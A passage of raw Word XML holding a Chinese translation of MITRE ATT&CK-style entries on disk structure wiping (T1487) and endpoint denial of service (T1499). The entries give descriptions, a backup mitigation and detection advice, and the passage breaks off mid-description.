        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="6B845EF2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4319BEBF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> T1487</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB78418" w14:textId="193671D9" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14537D57" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> Windows, macOS, Linux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61FC264E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215664EA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内核驱动，</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>MBG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A6A320A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270E529F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="503B6B2A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00351FC1" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128B10D6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会破坏或擦除引导系统所需的硬盘上的磁盘数据结构</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对特定关键系统以及网络中的大量系统，以中断系统和网络资源的可用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C11AEC4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会尝试通过覆盖位于主启动记录（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）或分区表等结构中的关键数据来使系统无法启动。磁盘结构中包含的数据可以包括用于加载操作系统的初始可执行代码或磁盘上文件系统分区的位置。如果此信息不存在，计算机将无法在引导过程中加载操作系统，从而使计算机不可用。磁盘结构擦除可以单独执行，也可以与磁盘内容擦除一起执行如果磁盘的所有扇区都被擦除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6A8AEA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00854077" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了最大限度地提高对目标组织的影响，设计用于销毁磁盘结构的恶意软件可能具有类似蠕虫的功能，可以通过利用其他技术（如有效帐户，凭据转储和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员共享）在网络中传播。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B601AA3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="3ACBA926" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="00EA9AB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="433DF423" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="4A60FF21" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3224F238" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据备份</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E6D18E6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>请考虑实施</w:t>
            </w:r>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IT</w:t>
            </w:r>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>灾难恢复计划，其中包含用于执行可用于还原组织数据的常规数据备份的过程。</w:t>
            </w:r>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00612FD1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保备份存储在系统之外，并受到保护，以防止攻击者可能使用常用方法获取访问权限并销毁备份以防止恢复。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06286B16" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0D327" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控对</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>敏感位置（</w:t>
      </w:r>
      <w:r w:rsidRPr="00612FD1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如主引导记录和磁盘分区表</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入。</w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00854077">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视异常内核驱动程序安装活动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD166CB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="321BB29D" w14:textId="4F102C24" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>终端</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>拒绝服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="434EA9E7" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B9FF07F" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1499</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71DA3291" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD2DD62" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6683EA6A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SSL/TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>应用防火墙日志，网络入侵检测系统，网络协议分析，网络设备日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术网络流分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC4E156" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3505919C" w14:textId="49744621" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>CAPEC ID</w:t>
            </w:r>
            <w:r w:rsidR="00E80078">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:hyperlink r:id="rId260" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00A65911">
                <w:t>CAPEC-227,</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId261" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00A65911">
                <w:t>CAPEC-131,</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId262" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00A65911">
                <w:t>CAPEC-130,</w:t>
              </w:r>
            </w:hyperlink>
            <w:hyperlink r:id="rId263" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00A65911">
                <w:t>CAPEC-125</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="31AFE0C5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BD8CF92" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079FE6EA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会执行端点拒绝服务（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）攻击来降低或阻止服务对用户的可用性。方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>耗尽服务（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网站、电子邮件、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用）所在的系统资源或利用系统来导致持续的崩溃。已发现</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>有攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出于政治目的或为了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>支持其它恶意活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而实施终端</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括分散注意力，黑客行为和敲诈勒索。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A4E71" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端点</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击拒绝服务的可用性，但不会使提供服务访问的网络饱和。攻击者可以针对提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>系统上</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>托管的应用堆栈的各个层来实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些层包括操作系统（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），服务器应用（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，数据库）以及它们之上的应用（通常基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。攻击每一层需要用不同的技术来利用各个组件特有的瓶颈。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
